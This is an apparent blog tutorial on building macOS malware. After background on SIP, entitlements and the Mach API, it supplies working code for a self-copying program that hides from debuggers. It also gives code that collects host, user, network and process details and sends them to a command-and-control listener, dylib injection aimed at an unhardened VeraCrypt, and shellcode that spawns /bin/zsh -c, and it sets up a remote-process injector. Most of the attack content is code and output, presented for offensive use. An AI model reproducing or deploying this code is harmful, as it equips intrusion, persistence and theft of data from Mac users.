macOS Malware Development I

09 Mar 2024

This piece offers a structured approach to analyzing and working with macOS internals with an eye on malware development. We begin with an overview of the macOS architecture, focusing on key components such as the Mach API and kernel. Next, we dive into fundamental system calls.

The guide concludes with a step-by-step demonstration of code injection and persistence techniques. As always, we provide a brief overview of the inner workings of the code, followed by a few examples, and then a detailed explanation.

Let’s start by understanding the macOS architecture and its security features. We’ll then delve into the internals, covering key elements like the Mach API and kernel, and we’ll walk through some basic system calls and examples that are easy to understand. Next, we’ll introduce a dummy malware. Later on, we’ll explore code injection techniques and how they’re utilized in malware. We’ll also touch on persistence methods.

To conclude, we’ll demonstrate a basic implementation of shellcode injection and persistence. Throughout, we’ll provide a detailed, step-by-step breakdown of the code and techniques involved.

A little background from the internet

The kernel is a hybrid Os merging the Mach microkernel with the FreeBSD monolithic kernel. The Mach microkernel provides core features like interprocess communication (IPC) using message passing, task management with separate address spaces, and default servers for services like virtual memory and clock management.

To address limitations such as the lack of user management, file systems, and networking, macOS integrates FreeBSD’s kernel components on top of Mach. These additions enable a fully functional operating system while avoiding excessive IPC overhead by running both kernels in the same privileged address space. Importantly, the Mach API is consistent for both kernel code and user processes, maintaining compatibility and easy interaction.


Before starting macOS development, it’s important to understand the system’s core security protections, especially System Integrity Protection (SIP).

SIP is a key security feature that protects important system files, directories, and processes from being changed or tampered with even by applications running as root. It blocks write access to certain system areas and adds extra checks for system extensions and kernel drivers. For example, kernel extensions must be signed by Apple or an approved developer with a valid Developer ID. This ensures that only trusted extensions can load, strengthening the system’s overall security.

SIP

SIP (System Integrity Protection) is enabled, providing key security protections. The “restricted” flag on certain directories shows which areas are protected. However, SIP’s protection doesn’t always extend to subdirectories within those flagged locations.

To handle this, macOS uses firmlinks special symbolic links protected by SIP. They work like regular symlinks but maintain SIP protection, allowing access to specific directories without breaking compatibility. Firmlinks make it possible to create usable links in protected paths like /usr/bin/sbin, and /etc.

This balances security and flexibility. For example, /usr/local is accessible via a firmlink, allowing developers to install and manage software there while still keeping the system secure.

Now, onto Entitlements permissions granted to applications on macOS that define their access and capabilities within the system. Entitlements control how an app interacts with system resources such as the network, file system, hardware, and user privacy-related data. By assigning specific entitlements, macOS ensures apps have the permissions needed to function while protecting system integrity and user privacy.

Entitlements are typically stored in a separate entitlements file that gets embedded in the app’s code signature, not directly in the Info.plist. However, the Info.plist contains general app metadata and configuration, while entitlements are part of the signed binary.

An entitlement looks like this in the entitlements file:

<key>com.apple.security.network.client</key>
<true/>

This example gives the app permission to act as a network client, allowing access to network resources. To view an app’s entitlements, you can run:

codesign --display --entitlements - /path/to/foo.app

Entitlements vary depending on what the app needs access to. By enforcing them, macOS ensures apps operate within defined boundaries, enhancing system security, privacy, and controlled resource access.

Info.plist

Now, let’s talk about (plist) or Property List files a common file format on macOS used to store structured data like configuration settings, preferences, and metadata. Plist files use a hierarchical key-value structure and support various data types. They can be stored in XML or binary formats.

On macOS, plist files are widely used for storing application metadata, entitlements, sandbox settings, and code signing information. For example:

Plist files support these common data types:

Like :

<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
  <dict>
    <key>com.apple.security.app-sandbox</key>
    <true/>
    <key>com.apple.security.files.user-selected.read-only</key>
    <true/>
    <key>com.apple.security.network.client</key>
    <true/>
  </dict>
</plist>

In this example:

These entitlements define what the app can do within the sandbox environment. You can convert and view plist files in different formats using plutil:

plutil -convert xml1 /Applications/Safari.app/Contents/Info.plist -o -
plutil -convert json /Applications/Safari.app/Contents/Info.plist -o -

Overall, plist files are essential in macOS for managing entitlements, sandboxing, code signing, and other configurations. That covers the basics. There’s more to explore like Gatekeeper, sandboxing internals, and app bundles but these are the key mechanisms developers should know. Next, we’ll dive deeper into macOS internals.


Mach API’s

In macOS, a traditional Unix “process” is redefined into two components: tasks and threads. A task represents a unit that contains resources such as virtual address space, IPC rights, and one or more threads of execution. Threads are the fundamental units of execution managed by the kernel. Depending on the context, threads may operate at the kernel level as Mach threads or at the user level as pthreads, with each mode serving distinct purposes within the system.

Inter-process communication in macOS relies on ports, a mechanism where tasks exchange structured messages asynchronously. Ports are uniquely identified within a task, ensuring secure communication between processes while maintaining kernel-level oversight.

Mach’s virtual memory subsystem supports stuff like address maps, memory objects, and exception trick’s. Memory objects work as containers for data mapped to a task’s address space, which is managed efficiently to optimize performance. Exception ports assigned to tasks and threads allow for custom exception handling, where a handler can manage, suspend, or terminate a thread as needed.

Mach also provides system calls to perform essential operations, including retrieving system information and injecting code into other processes. These system calls operate at the kernel level and are typically wrapped by user-friendly C library functions. So yep Unix shit

Let’s cover the basics of Mach system calls, including retrieving system information and performing code injection.

A system call is a kernel function triggered from user space to request core system services. Common tasks include writing to a file descriptor or terminating a process. On macOS, most system calls are wrapped by C library functions, making them easier to use in applications.

If we head over to the Mach IPC Interface or Apple documentation we can find a Mach system call that’s pretty handy for getting basic info about the host system. It tells us stuff like how many CPUs there are, both maximum and available, the physical and logical CPUs, memory size, and the max memory size. This call is host_info(), and it’s super useful for getting details about a host, like what kind of processors are installed, how many are currently available, and the total memory size.

Like many Mach info calls, host_info() requires a flavor argument to specify the type of information you want. Its function signature looks like this:

kern_return_t host_info(host_t host, host_flavor_t flavor,
                        host_info_t host_info,
                        mach_msg_type_number_t host_info_count);

Besides host_info(), other calls like host_kernel_version(), host_get_boot_info(), and host_page_size() can be employed to access miscellaneous system details.

int main() {
    kern_return_t kr; /* the standard return type for Mach calls */
    mach_port_t myhost;
    char kversion[256]; 
    host_basic_info_data_t hinfo;
    mach_msg_type_number_t count;
    vm_size_t page_size;
  

    // Retrieve System Information
    printf("Retrieving System Information...\n");

    // Get send rights to the name port for the current host
    myhost = mach_host_self();

    // Get kernel version
    kr = host_kernel_version(myhost, kversion);
    EXIT_ON_MACH_ERROR("host_kernel_version", kr);

    // Get basic host information
    count = HOST_BASIC_INFO_COUNT; // size of the buffer
    kr = host_info(myhost, HOST_BASIC_INFO, (host_info_t)&hinfo, &count);
    EXIT_ON_MACH_ERROR("host_info", kr);

    // Get page size
    kr = host_page_size(myhost, &page_size);
    EXIT_ON_MACH_ERROR("host_page_size", kr);

    printf("Kernel Version: %s\n", kversion);
    printf("Maximum CPUs: %d\n", hinfo.max_cpus);
    printf("Available CPUs: %d\n", hinfo.avail_cpus);
    printf("Physical CPUs: %d\n", hinfo.physical_cpu);
    printf("Maximum Physical CPUs: %d\n", hinfo.max_cpus);
    printf("Logical CPUs: %d\n", hinfo.logical_cpu);
    printf("Maximum Logical CPUs: %d\n", hinfo.logical_cpu);
    printf("Memory Size: %llu MB\n", (unsigned long long)(hinfo.memory_size >> 20));
    printf("Maximum Memory: %llu MB\n", (unsigned long long)(hinfo.max_mem >> 20));
    printf("Page Size: %u bytes\n", (unsigned int)page_size);

    // Clean up and exit
    mach_port_deallocate(mach_task_self(), myhost);
    exit(0);
}

The basic code so far just pulls system information, like the kernel version — simple and harmless. But to dive deeper into system calls, let’s explore something more aggressive, similar to malware behavior. For example, writing a copy of the executable to /usr/bin/ or /Library/.

To perform actions like this, we need task-level operations since controlling another process or accessing system-level processes requires interacting with Mach tasks. Relevant Mach system calls include pid_for_task()task_for_pid()task_name_for_pid(), and mach_task_self(). These functions allow converting between Mach task ports and Unix PIDs.

However, most of these calls are heavily restricted on macOS due to security features like SIP (System Integrity Protection), entitlements, and UID checks. They bypass the standard capability model and are not part of the public API. Usage typically requires elevated privileges, such as running as root or being part of the procview group.

For instance, task_for_pid() is blocked by SIP when targeting system binaries. If it worked, it would give full control over the target process, allowing anything from memory access to code injection.

For this example, we’ll stick to mach_task_self(), which refers to the current process and usually doesn’t require special privileges

void hide_process() {
    mach_port_t task_self = mach_task_self();
    kern_return_t kr;

    // Set exception ports to disable debuggers.
    kr = task_set_exception_ports(task_self, EXC_MASK_ALL, MACH_PORT_NULL, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, THREAD_STATE_NONE);
    if (kr != KERN_SUCCESS) {
        printf("Uh-oh: Failed to set exception ports: %s\n", mach_error_string(kr));
        exit(EXIT_FAILURE);
    }

    printf("Shhh... Process is now hidden\n");
}

The function retrieves the current task port using mach_task_self(). In Mach, the task port represents the process itself and provides control over the task when a valid send right is held.

It then calls task_set_exception_ports() to modify the task’s exception handling behavior. By setting all exceptions (EXC_MASK_ALL) to MACH_PORT_NULL, the process clears any external exception handlers — including potential debuggers that rely on intercepting exceptions.

However, This doesn’t truly hide the process or prevent monitoring via other means like pstop, or system APIs. It mainly makes standard debugging harder by breaking the exception handling chain.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <mach/mach.h>
#include <mach/mach_init.h>
#include <mach/task.h>
#include <limits.h>

#define BUF_SIZE 4096
#define PERMISSIONS S_IRUSR | S_IWUSR | S_IXUSR
#define MALWARE_NAME "mw"
#define FLAG_FILE "/tmp/s_flag"

// new loca
void copy_self(const char * self,
  const char * dest_path) {
  char buf[BUF_SIZE];
  size_t bytes;

  FILE * self_file = fopen(self, "rb");
  FILE * dest = fopen(dest_path, "wb");

  while ((bytes = fread(buf, 1, BUF_SIZE, self_file)) > 0) {
    fwrite(buf, 1, bytes, dest);
  }

  fclose(self_file);
  fclose(dest);

  chmod(dest_path, PERMISSIONS);
}

void hide_process() {
  mach_port_t task = mach_task_self();
  task_set_exception_ports(task, EXC_MASK_ALL, MACH_PORT_NULL, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES, THREAD_STATE_NONE);
}

int main(int argc, char * argv[]) {
  char dest_path[PATH_MAX];
  const char * home_dir = getenv("HOME");

  snprintf(dest_path, PATH_MAX, "%s/%s", home_dir, MALWARE_NAME);

  // if it's the one
  if (access(FLAG_FILE, F_OK) != 0) {
    // only if it doesn't already exist
    if (access(dest_path, F_OK) != 0) {
      copy_self(argv[0], dest_path);
    }

    // we need a flag to indicate the first replica has executed we can't enter a loop.
    FILE * flag_file = fopen(FLAG_FILE, "w");
    fclose(flag_file);
  } else {
    // Exit if it is not the first replica
    return EXIT_SUCCESS;
  }

  printf("Hello, World!\n");

  hide_process();

  // run.
  if (fork() == 0) {
    execl(dest_path, dest_path, NULL);
  }

  return EXIT_SUCCESS;
}

This here is sample code we have the copying mechanism, responsible for making a duplicate of the running executable, the whole idea here is self-replication it’s copying itself to a new location, which is a fundamental step in how malware spreads or maintains persistence on a system, and if you notice we kinda track the execution avoiding infinite loops with a flag, . If it runs multiple times, it could end up copying itself over and over in an infinite loop. To avoid that, we use a flag file

This technique is simple. It ensures that even if the original process exits or hides, the new copy of the program continues running. This is how many types of malware operate. They don’t rely on just one process. Instead, they make sure that if one process is removed or hidden, another one takes its place.

Right now, we’re keeping things simple and easy to understand. But in the next section, we’ll dive deeper and expand on this idea. We’ll look at how to make the program more persistent, spread, and evade detection.

For now, keep in mind that this code is basic but can be dangerous if not handled carefully. If you want to test it, don’t run it on your main machine. Alright.

   _main:
     0000000100003 d20 push rbp
   0000000100003 d21 mov rbp, rsp
   0000000100003 d24 sub rsp, 0x440
   0000000100003 d2b mov rax, qword[___stack_chk_guard_100004000];
   ___stack_chk_guard_100004000
   0000000100003 d32 mov rax, qword[rax]
   0000000100003 d35 mov qword[rbp + var_8], rax
   0000000100003 d39 mov dword[rbp + var_414], 0x0
   0000000100003 d43 mov dword[rbp + var_418], edi
   0000000100003 d49 mov qword[rbp + var_420], rsi
   0000000100003 d50 lea rdi, qword[aHome];
   argument "name"
   for method imp___stubs__getenv, "HOME"
   0000000100003 d57 call imp___stubs__getenv;
   getenv
   0000000100003 d5c mov qword[rbp + var_428], rax
   0000000100003 d63 lea rdi, qword[rbp + var_410];
   argument #1 for method imp___stubs____snprintf_chk
0000000100003d6a         mov        r9, qword [rbp+var_428]
0000000100003d71         mov        ecx, 0x400                                  ; argument # 4
   for method imp___stubs____snprintf_chk
   0000000100003 d76 xor edx, edx;
   argument #3 for method imp___stubs____snprintf_chk
0000000100003d78         lea        r8, qword [aSs]                             ; argument # 5
   for method imp___stubs____snprintf_chk, "%s/%s"
   0000000100003 d7f lea rax, qword[aMw];
   "mw"
   0000000100003 d86 mov rsi, rcx;
   argument #2 for method imp___stubs____snprintf_chk
0000000100003d89         mov        qword [rsp+0x440+var_440], rax
0000000100003d8d         mov        al, 0x0
0000000100003d8f         call       imp___stubs____snprintf_chk                 ; __snprintf_chk
0000000100003d94         lea        rdi, qword [aTmpsflag]                      ; argument "path" for method imp___stubs__access, "/tmp/s_flag"
0000000100003d9b         xor        esi, esi                                    ....

0000000100003dc2         mov        rax, qword [rbp+var_420]
0000000100003dc9         mov        rdi, qword [rax]
0000000100003dcc         lea        rsi, qword [rbp+var_410]
0000000100003dd3         call       _copy_self                                  ; _copy_self

Here we put our little program into a debugger, and we can observe its behavior step by step. The program checks for the existence of a specific flag file (/tmp/s_flag). If the file does not exist, the program proceeds to copy itself to the user’s home directory (e.g., /Users/username/mw).

The Naive Way

After infecting a new host, it’s important for the malware to notify us of its presence by sending system information back to a Command & Control (C2) server. Although connecting to a C2 server right away might seem like an amateurish approach for malware, especially at the beginning, it’s a good starting point for exploring macOS. The information we collect could include details such as the system name, release version, machine architecture, hardware model, user ID, home directory, and more. To retrieve and modify system information, we can use Apple’s sysctlbyname function, which allows us to query specific system details directly from the kernel, such as the cache line size.

For user-related data, we typically use standard POSIX functions like getpwuid(), which give us access to user information. If we want to get the hardware model, instead of using "hw.cachelinesize", we would query "hw.model"in the sysctlbyname function.

Now, let’s go a step further and gather even more information about the infected system. The reason for switching from the first approach to this one is to demonstrate how we access user-related data using POSIX interfaces. However, if you’d like to include the hardware model in the first example, you can do so by using the following code:

count = sizeof(model); kr = sysctlbyname("hw.model", model, &count, NULL, 0); EXIT_ON_MACH_ERROR("sysctl hw.model", 1);

Plus, it’s important to gather the kernel version, as this could help identify known vulnerabilities and provide a way to escalate privileges. Here’s an example of how we can use the sysctlbyname function to fetch the kernel version:

size_t len = BUF_SIZE;
if (sysctlbyname("kern.version", &kernel_version, &len, NULL, 0) == 0) {
    send_data(sockfd, "\nKernel Version: ");
    send_data(sockfd, kernel_version);
}

We also want to dump and send more detailed information about the infected host, such as the system name, architecture, login shell, home directory, and any other useful data that could help us exploit the system further or maintain access. Functions like unamegetpwuid, and getgrgid can help retrieve this information.

// Collect system information
void sys_info(RBuff *report) {
    struct utsname u; 
    if (uname(&u) == 0) {
        report->pointer += snprintf(report->buffer + report->pointer, sizeof(report->buffer) - report->pointer, 
            "[System Info]\nOS: %s\nVersion: %s\nArch: %s\nKernel: %s\n\n", u.sysname, u.version, u.machine, u.release);
    }
}

// Collect user information
void user_info(RBuff *report) {
    struct passwd *user = getpwuid(getuid()); 
    if (user) 
        report->pointer += snprintf(report->buffer + report->pointer, sizeof(report->buffer) - report->pointer, 
            "[User Info]\nUsername: %s\nHome: %s\n\n", user->pw_name, user->pw_dir);
}
....

So, the function is pretty self-explanatory; it simply provides a snapshot of the system and user environment, which is crucial for gathering information on potential targets. However, since malware typically only has one chance for infection, it needs to be self-reliant before attempting to Phone Home. This is why the approach of using a dummy malware, primarily for testing and exploring options before developing an actual malware, is essential.

Nevertheless, deploying a dummy malware still provides attackers with a significant amount of information that could be leveraged for subsequent targeted attacks or exploiting vulnerabilities, whether in the kernel or user land. The malware could be multi-staged to ensure stealth and a low profile. This code can act as stage 1 of an attack, proliferating itself in the system, waiting to activate stage 2, and so on. These types of attacks are advanced and hard to detect, especially in environments like macOS, where malware can remain undetected for years.

Another type of information gathering employed by macOS malware, as seen in some reports, involves ‘LOLBins’ (Living off the Land Binaries). You can program the malware to simply execute /usr/sbin/system_profiler -nospawn -detailLevel full, For example.

This command alone saves the trouble and provides all the information about a host that an attacker can gather. However, the catch is that such commands are visible and can be easily flagged. Despite this, it remains an easy and effective method for malware to extract details from the infected host.

Alright, so how do we transmit the data? We use socket. This API allows us to send data to the connected endpoint, which in this case is the Command & Control server. Data is sent in the form of strings. To ensure that the data is properly formatted and transmitted over the socket to the C2 server, we rely on functions like send() for sending data, and file I/O functions such as popen() and fgets() for reliable reading and sending of data. It’s pretty simple.

The C2 server is also straightforward, designed solely for handling incoming connections. It won’t have any protection mechanisms to hide itself from the system where it’s running, but this server is basic for demonstration purposes only. I recommend implementing encryption, setting up a database to organize data, and generating a temporary ID to associate with each instance.

The extraction module (ext) starts an autonomous thread listening for incoming connections from malware instances. Once connected, the module simply prints the content of the incoming connection (which is the information extracted by the client) to the standard output.

// The server will keep listening for incoming connections indefinitely
while (1) {
    // Accept a new connection from a client
    cltlen = sizeof(cltaddr);
    cltfd = accept(dexft_fd, (struct sockaddr *) &cltaddr, &cltlen);

    // Check if the accept call was successful
    if (cltfd < 0) {
        // If accept failed, print an error message and continue listening
        printf("Failed to accept incoming connection, %d\n", cltfd);
        continue;
    }

    // Print out information about the connected client
    printf("Collecting data from client %s:%d...\n", inet_ntoa(cltaddr.sin_addr), ntohs(cltaddr.sin_port));

    // Receive data from the client and process it
    while ((br = recv(cltfd, buf, BUF_SIZE, 0)) > 0) {
        // Write the received data to the standard output
        fwrite(buf, 1, br, stdout);
    }

    // Check if an error occurred during data reception
    if (br < 0) {
        printf("ERROR: Failed to receive data from client!\n");
    }

    // Close the client socket
    close(cltfd);
}

return NULL;

As you can see, the code itself is quite simple yet functional. Once the client is executed, the server collects data from the connected clients, and then closes the connection before resuming listening for new connections,

~/Desktop/i/ > ./ctwo
Initializing Data Extraction...
Listening...
Incoming data from the client 0.0.0.0:00000...
=== System Information Report ===

[System Information]
System: Darwin
Release: 22.6.0
Architecture: x86_64
Kernel: Darwin Kernel Version 22.6.0: Tue Dec 19 10:14:25 PST 2023; root:xnu-8790.41.0~4/RELEASE_X86_64

[User Information]
User: jdoe
Group: staff
Home Directory: /Users/jdoe

[Network Information]
Interface: en0 | IPv4: 192.168.1.10
Interface: en0 | IPv6: fe80::1c2b:e3ff:fe40:923b
Interface: awdl0 | IPv6: fe80::b2b1:29ff:fe76:a865
Interface: utun2 | IPv6: fde8:1d9c:2237:0:1c2b:e3ff:fe40:923b

[Environment Variables]
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin
SHELL=/bin/zsh
HOME=/Users/jdoe
TERM=xterm-256color
USER=jdoe
LANG=en_US.UTF-8

[CPU Information]
CPU: Apple M1 Max

[Disk Usage]
Total: 476839 MB | Free: 324102 MB

[Running Processes]
PID: 234 | Process: /System/Library/CoreServices/WindowServer
PID: 514 | Process: /Applications/Safari.app/Contents/MacOS/Safari
PID: 1001 | Process: /Applications/Spotify.app/Contents/MacOS/Spotify
PID: 1147 | Process: /Applications/Terminal.app/Contents/MacOS/Terminal
PID: 1302 | Process: /usr/sbin/sshd

=== End of Report ===

Obviously, this will get flagged within seconds if there’s a firewall in place. Why? Because the behavior here is a dead giveaway of malware—executing commands, establishing connections, and sending system information while waiting for further instructions from a remote server. The network traffic alone is a red flag. Plus, transmitting detailed information about the system right after connecting doesn’t exactly scream “legitimate activity.” Instead, it’s more likely to raise suspicion, especially if it’s not limited to necessary data but includes a full host enumeration and other detailed system information.

The good news is that most Mac users think they’re safe by default, which means they don’t consider the possibility of sophisticated malware sneaking by undetected.

Now, if this were part of a targeted attack, things would be different. With a bit of obfuscation, maybe polymorphic code, and advanced covert communication channels—which we’ll get into later this would be much harder to spot. But for now, this simple example serves as a way to demonstrate how dummy malware works and how it can be a useful learning tool before moving on to more advanced malware development. Next, we’ll dive into a topic I find quite interesting. Yes, you guessed it

Code Injection

Code injection could easily fill its own article, resources at the end. For now, let’s focus on two effective techniques. First, using environment variables or DYLD_INSERT_LIBRARIES for code injection.

users can preload dynamic libraries into apps. Both devs and attackers can inject code into running processes without changing the original executable. It’s used to intercept function calls, manipulate behavior, or add malicious features. Essentially, it’s a colon-separated list of dylibs loaded before the app’s ones, allowing testing new modules in existing libraries.

In short, it loads specified dylibs before the program, injecting a dylib into the app. Example:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))

void foo() {
  printf("Dynamic library injected! \n");
  system("/bin/bash -c 'echo Library injected!'");
}

Here, we have foo(), which prints a success message when the library is injected, along with a system command that runs a shell to echo the same thing.

The __attribute__((constructor)) ensures the function runs before the app’s main function, into which we injected the dylib. Piece of cake, right? But how do we identify binaries vulnerable to environment variable injection? We’ll cover that later. For now, let’s try it on one of our previous programs. Just compile and run the code like any other.

~ > gcc -dynamiclib inject.c -o inject.dylib

~ > DYLD_INSERT_LIBRARIES=inject.dylib ./foo
Dynamic library injected!
Library injected!

Et voilà! When vulnerable, what happens is the system loads any dylibs specified in the DYLD_INSERT_LIBRARIESenvironment variable before the main program loads, effectively injecting a dylib into the application. This could potentially lead to privilege escalation, but not so fast on the Apple platform. As of macOS 10.14, third-party developers can opt into a “Hardened Runtime,” which prevents dylib injection using this technique.

Reference: Hardened Runtime

In simple terms, injection still works if the application doesn’t have the “Hardened Runtime” enabled, allowing dylibs to be injected via environment variables. However, when the binary is protected with a hardened runtime and the developer has included the appropriate entitlements, it changes things. Let’s break it down:

For example, trying to run this on Safari.app wouldn’t work because it’s protected by a hardened runtime and doesn’t have the necessary entitlement.

This doesn’t mean the app isn’t hardened, though. Other Hardened Runtime features might not show in the entitlements. After checking, I found VeraCrypt version 1.24. Version alone doesn’t mean it’s immune to dylib injection. If VeraCrypt doesn’t use the Hardened Runtime feature (which it seems it doesn’t here), it’s still vulnerable.

Let’s get straight to it: DYLD_INSERT_LIBRARIES. If VeraCrypt doesn’t have proper security measures like entitlements or a hardened runtime, you can inject a dylib into it. This allows code execution in the app’s process, and depending on permissions, could escalate privileges.

With VeraCrypt 1.24 not hardened, it’s more likely vulnerable, though macOS security features and the environment may provide some defense.

This technique works unless specific entitlements block it, like com.apple.security.cs.allow-dyld-environment-variables, or if the app has other protections in place post-macOS 10.14. If it’s not protected, try injecting with DYLD_INSERT_LIBRARIES—if it works, you can inject into VeraCrypt.

I’ll use this as an example for the article. Let’s attempt the injection

__attribute__((constructor))

static void customConstructor(int argc, const char **argv)
{
printf("Foo!\n");
syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}

So, we simply print ‘foo’ and log a message using the syslog() function, which logs an message indicating successful injection of a dynamic library (dylib) along with the name of the program. Let’s try it. If we see the following output, it seems that we’ve successfully loaded the library:

dy

Reference: DYLD_INSERT_LIBRARIES DYLIB injection

macOS expects threads to be created using BSD APIs, with Mach and pthread structures set up properly especially since macOS 10.14 introduced changes.

To solve this, I found a piece of code called inject.c. I also recommend reading the Mac Hacker’s Handbook for great insights and examples of interprocess code injection.

Reference: inject.c

From what I’ve gathered, transitioning from Mach thread APIs to pthread APIs on macOS, especially with thread initialization, is tricky. However, the _pthread_create_from_mach_thread function offers a solid solution for initializing pthread structures from Mach threads, ensuring compatibility and correct thread behavior across macOS versions.

For those curious, I’ve added examples showing how to inject code to call dlopen and load a dylib into a remote Mach task: 

https://gist.github.com/knightsc/45edfc4903a9d2fa9f5905f60b02ce5a https://gist.github.com/vocaeq/fbac63d5d36bc6e1d6d99df9c92f75dc

Alright that was cool, Let’s check the second technique. It’s similar to Windows methods specifically process injection, where one process runs code in another. On Windows, this evades AV via techniques like DLL hijacking, In macOS, the impact is larger due to permission differences between apps.

In the classic Unix model, processes run as a specific user. Each file has an owner, group, and flags for read/write/execute permissions. Processes running as the same user share the same permissions—there’s no boundary between them. One process could attach to another as a debugger, reading or writing its memory or registers. Root is the exception, having unrestricted access to files and processes, and can access all data on disk or in RAM.

macOS followed this model until the introduction of… yep, SIP (System Integrity Protection).

macOs Shellcode Development

Alright, we’ll write a simple shellcode injection where the host process injects shellcode into a remote process’s memory. But first, let’s write some shellcode for testing.

Writing 64-bit assembly on macOS is a bit different from ELF. Here, you need to understand the Mach-O format, but for simplicity, we’ll stick with x86_64 and use a linker for Mach-O executables later.

Reference: Writing 64 Bit Assembly on Mac OS X

A basic Hello World program uses two sections: .data for storing data and .text for executable code. We got the _main function as the entry point, followed by a trick section. After that, a call instruction invokes the continuesubroutine, which pops the address of “Hello World!”. At the end, there’s a system call to exit the program first, a syscall for writing data.

trick.s

section .data
section .text

global _main
	_main:

start:
	jmp trick

continue:
	pop rsi            ; Pop string address into rsi
	mov rax, 0x2000004 ; System call write = 4
	mov rdi, 1         ; Write to standard out = 1
	mov rdx, 14        ; The size to write
	syscall            ; Invoke the kernel
	mov rax, 0x2000001 ; System call number for exit = 1
	mov rdi, 0         ; Exit success = 0
	syscall            ; Invoke the kernel
	
trick:
	call continue
	db "Hello World!", 0, 0

Alright, time to compile. I usually use NASM to assemble my code. Remember the linker I mentioned? After assembling with NASM, we’ll link it with ld. The linker brings the assembled code together and adds the required system libraries.

Pretty slick, huh? Now, to make it usable for injection, we need to convert it into machine code—basically a hex string. These bytes are the exact instructions the processor will execute. For this, we use objdump.

~ > ./nasm -f macho64 trick.s -o trick.o && ld ./trick.o -o Hello -lSystem

~ > ./Hello
Hello World!

~ > objdump -d ./Hello | grep '[0-9a-f]:'| grep -v 'file'| cut -f2 -d:| cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '| sed 's/ $//g'| sed 's/ /\\x/g'| paste -d '' -s | sed 's/^/"/'| sed 's/$/"/g'

`\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a`

If objdump fails to extract the shellcode, just script it with a simple py to parse the assembly output. Easy fix

od2shell.py

import os, sys
import re

def extract_shellcode(objdump_output):
    shellcode = ""
    length = 0
    lines = objdump_output.split('\n')
    
    for line in lines:
        if re.match("^[ ]*[0-9a-f]*:.*$", line):
            line = line.split(":")[1].lstrip()
            x = line.split("\t")
            opcode = re.findall("[0-9a-f][0-9a-f]", x[0])
            for i in opcode:
                shellcode += "\\x" + i
                length += 1

    return shellcode, length

def main():
    objdump_output = sys.stdin.read()
    shellcode, length = extract_shellcode(objdump_output)
    
    if shellcode == "":
        print("Bad")
    else:
        print("\n" + shellcode)

if __name__ == "__main__":
    main()

Does the shellcode work? To test, let’s inject it. One way is to store it in the executable’s __TEXT,__text section as a global var. Just declare it like this:

const char output[] __attribute__((section("__TEXT,__text"))) = "\xeb\x1e\x5e\xb8\x04\x00\x00\x02\xbf\x01\x00\x00\x00\xba\x0e\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x02\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a";

Then use a function pointer to execute it:

typedef int (*funcPtr)();

int main(int argc, char **argv) {
    funcPtr ret = (funcPtr) output;
    (*ret)();
    return 0;
}

Simple and effective.

Now this is pretty simple and since we already in shellcode development let’s write a proper shellcode that actually can be used offensivlly or atleast seem like it ;) what about open a calculator huh? or execute shell considering I’m running zsh.

On macOS, you’d use open -a calculator. However, I want to keep the shellcode flexible and capable of running different types of programs or commands, not just opening a calculator. For that, we need to use a syscall like execve to trigger the execution of something specific, such as /bin/zsh -c.

The execve syscall allows a process to execute the program specified by a pathname. In this case, we’ll be executing /bin/zsh -c, which means executing a shell command.

the syscall inputs to run a shell or potentially another executable. Once the syscall is invoked via execve, we’re good to go.

To manage the code’s flow, we add a jump to the exec label, which will trigger the code that sets up the syscall. Afterward, the shellcode is set to execute the intended command.

exec.s

global _main

_main:
    xor rdx, rdx            ; Zero out the rdx register (NULL for string terminator)
    push rdx                ; Push NULL (0x0) onto the stack (string terminator)
    mov rbx, '/bin/zsh'     ; Load the path to the shell '/bin/zsh' into rbx
    push rbx                ; Push '/bin/zsh' onto the stack
    mov rdi, rsp            ; Set rdi to point to the start of the string "/bin/zsh"
    xor rax, rax            ; Clear rax to use it for setting up -c argument
    mov ax, 0x632D          ; Load the ASCII value of '-c' (0x632D) into rax
    push rax                ; Push the -c argument onto the stack
    mov rbx, rsp            ; Set rbx to point to the '-c' flag in memory (stack)
    push rdx                ; Push NULL onto the stack (0 as envp in execve)
    jmp short exec          ; Jump directly to the exec subroutine to execute the shell

exec:
    push rbx                ; Push "-c" argument onto stack (the flag)
    push rdi                ; Push '/bin/zsh' (the program) onto stack
    mov rsi, rsp            ; Set rsi to point to the stack (ARGV[])
    push 59                 ; Syscall number 59 (execve)
    pop rax                 ; Pop syscall number into rax
    bts rax, 25             ; Set the 25th bit in rax (AT_FDCWD flag to indicate current working directory)
    syscall                 ; Call the syscall (execve to spawn the shell)

dummy:
    call exec               ; If the exec fails (should not happen if valid exec), redirect flow here (hang forever)
    db 'open -a calculator', 0 ; Insert the string for opening calculator (useless in this case but fun to play with)
    push rdx                ; Push NULL (end of string)

This opens up countless possibilities: Executing payload or other application as seen, opening up more entry points, also keep in mind what we’ve just written is highly adaptable and can be obfuscated or modified to be stealthier, depending on the situation.

Alright, now that we’ve got ourselves a set of shellcode, it’s time to step up our game and write an actual process injector for macOS. This injector will serve as the vehicle to deliver our shellcode into a remote process, allowing us to establish communication with our C2 server and transmit host data to our server for further exploitation.

Old Application, Old Tricks

Remember the example we used earlier to showcase dylib injection? Yep, VeraCrypt, that’ll serve as our malware entry point to execute its payload. So, what do I mean by that? Once the dummy malware infects the host, it will specifically target potential applications that may be vulnerable to injection like older or unsigned ones. When such an application is identified, it will serve as the entry point.

By exploiting this vulnerable application process, we’ll execute the payload that will gather a profile of the host and send the data back to the C&C server, signaling that we’ve successfully infiltrated the system, We first need to write an actual injector to showcase process injection. However, this will depend heavily on elevated privileges. Why? Well, remember the mach_vm_protect and task_for_pid APIs? They are key in manipulating the memory of other processes, and this example involves them, so administrative privileges are a must.

